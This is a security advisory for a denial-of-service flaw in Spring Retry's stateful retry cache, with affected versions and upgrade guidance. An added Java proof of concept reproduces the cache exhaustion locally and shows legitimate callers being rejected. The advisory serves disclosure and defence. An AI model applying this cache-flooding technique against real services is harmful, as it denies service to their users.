CVE-2026-41710: Cache Exhaustion in Stateful Retries leads to Denial of Service

MEDIUM | JUNE 08, 2026 | CVE-2026-41710

Description

An attacker can craft a large number of unique requests that trigger a failure, exhausting the capacity of the application-wide stateful retry cache. Once the cache is full, it permanently rejects any further updates, causing all later stateful retries and circuit breakers in the application to fail.

This issue only affects applications where all the following are true:

  • The application explicitly enables stateful retries using @Retryable(stateful=true).
  • The cache keys for these stateful retries are attacker-controlled, which is the case with the default key generator if the method arguments are provided by the attacker.
  • The attacker can cause the invocation to fail and ensure the same request is never re-presented.

Because cache entries are only removed upon success or retry exhaustion, a failed item that is abandoned stays in the cache forever.

Stateless retries, which are the default behavior, are not vulnerable.
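The following is an added example written for this page, not code from the advisory or from the Spring Retry project. It reproduces the failure mode described above with the RetryTemplate/RetryState API that backs @Retryable(stateful=true): each stateful attempt that fails parks its RetryContext in the shared RetryContextCache under the caller-supplied key, and that entry is only evicted on success or exhaustion. It assumes Spring Retry 2.0.x (and Spring Core) on the classpath; the cache capacity of 4, the DownstreamFailure exception and the request keys are constructed values so the effect is visible in a handful of iterations.

```java
import org.springframework.retry.RetryException;
import org.springframework.retry.policy.MapRetryContextCache;
import org.springframework.retry.policy.SimpleRetryPolicy;
import org.springframework.retry.support.DefaultRetryState;
import org.springframework.retry.support.RetryTemplate;

/**
 * Added demonstration of the advisory's failure mode (not code from the advisory
 * or the Spring Retry project). A failed stateful attempt parks its RetryContext
 * in the RetryContextCache under the caller-supplied key; the entry is only
 * removed on success or retry exhaustion, so an abandoned failure stays forever.
 */
public class StatefulRetryCacheExhaustion {

    /** Constructed failure standing in for the attacker-triggered invocation failure. */
    static final class DownstreamFailure extends RuntimeException {
        DownstreamFailure(String message) { super(message); }
    }

    static RetryTemplate statefulTemplate(int cacheCapacity) {
        RetryTemplate template = new RetryTemplate();
        template.setRetryPolicy(new SimpleRetryPolicy(3));
        // MapRetryContextCache is the template's default cache type; the capacity here is a
        // constructed small value (the library default is much larger) to keep the demo short.
        template.setRetryContextCache(new MapRetryContextCache(cacheCapacity));
        return template;
    }

    /** One stateful attempt keyed by client-controlled input that fails and is never re-presented. */
    static String abandonedFailingRequest(RetryTemplate template, String clientSuppliedKey) {
        try {
            template.<Void, DownstreamFailure>execute(
                    ctx -> { throw new DownstreamFailure("attempt " + ctx.getRetryCount() + " failed"); },
                    new DefaultRetryState(clientSuppliedKey));
            return "unexpected success";
        } catch (DownstreamFailure e) {
            // Stateful retry rethrows at once so the caller can roll back; the
            // RetryContext for this key now occupies a slot in the shared cache.
            return "parked in cache";
        } catch (RetryException e) {
            // At capacity, registering the failure itself fails (the root cause is
            // RetryCacheCapacityExceededException), and it fails for every caller
            // that shares this cache, not only the abusive one.
            return "rejected: " + e.getMostSpecificCause().getClass().getSimpleName();
        }
    }

    public static void main(String[] args) {
        RetryTemplate template = statefulTemplate(4);

        for (int i = 0; i < 6; i++) {
            String key = "order-" + i; // constructed unique, client-chosen request identity
            System.out.println(key + " -> " + abandonedFailingRequest(template, key));
        }

        // A legitimate stateful caller arriving with a fresh key is now collateral damage.
        System.out.println("legitimate-key -> " + abandonedFailingRequest(template, "legitimate-key"));

        // Stateless retry on the same template never touches the context cache and keeps working.
        String result = template.execute(ctx -> "stateless ok");
        System.out.println("stateless -> " + result);
    }
}
```

Run it with the Spring Retry and Spring Core jars on the classpath: the first four keys print "parked in cache", every later key, including the legitimate one, prints "rejected: RetryCacheCapacityExceededException", and the stateless call still succeeds. The fix is to upgrade to a patched version; the demo also makes the advisory's preconditions concrete, since nothing here is reachable unless stateful retry is enabled and the key derives from caller-controlled input.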

Affected Spring Products and Versions

Spring Retry:

  • 2.0.0 - 2.0.12
  • 1.3.0 - 1.3.4

Versions that are no longer supported are also affected.

Mitigation

Users of affected versions should upgrade to the corresponding fixed version.

Affected version(s)   Fix version   Availability
2.0.x                 2.0.13        OSS
                      2.0.12.1      Enterprise Support Only
1.3.x                 1.3.5         Enterprise Support Only

References

https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H&version=3.1

History

  • 2026-06-08: Initial vulnerability report published.
